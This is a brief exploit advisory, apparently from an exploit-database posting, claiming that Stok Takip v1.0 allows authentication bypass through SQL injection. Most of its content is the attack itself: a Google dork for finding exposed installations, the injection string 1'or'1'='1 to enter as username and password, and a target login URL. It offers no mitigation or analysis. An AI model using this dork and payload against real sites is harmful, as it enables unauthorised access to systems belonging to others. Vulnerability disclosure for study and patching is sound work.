Stok Takip version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.
3e3c47c39d6e7d2cb47bf2481753a2206cf561455c8212b6ffff3035e57dc1c5
========================================================================
| # Title : Stok Takip v1.0 Authentication bypass vulnerability
| # Author : indoushka
| # email : indoushka4ever@gmail.com
| # Tested on : windows 10 FranASSais V.(Pro)
| # Version : v1.0
| # Vendor : http://wmscripti.com/
| # Dork : "PufyTek | Stok Takip v1.0"
========================================================================
poc :
[+] Dorking Adegn Google Or Other Search Enggine
[+] use payload : as user & pass 1'or'1'='1
http://stok.website/index.php
Greetz :----------------------------------------------------------------------------------------
|
jericho * Larry W. Cashdollar * shadow0075 * djroot.dz *Gjoko 'LiquidWorm' Krstic |
|
================================================================================================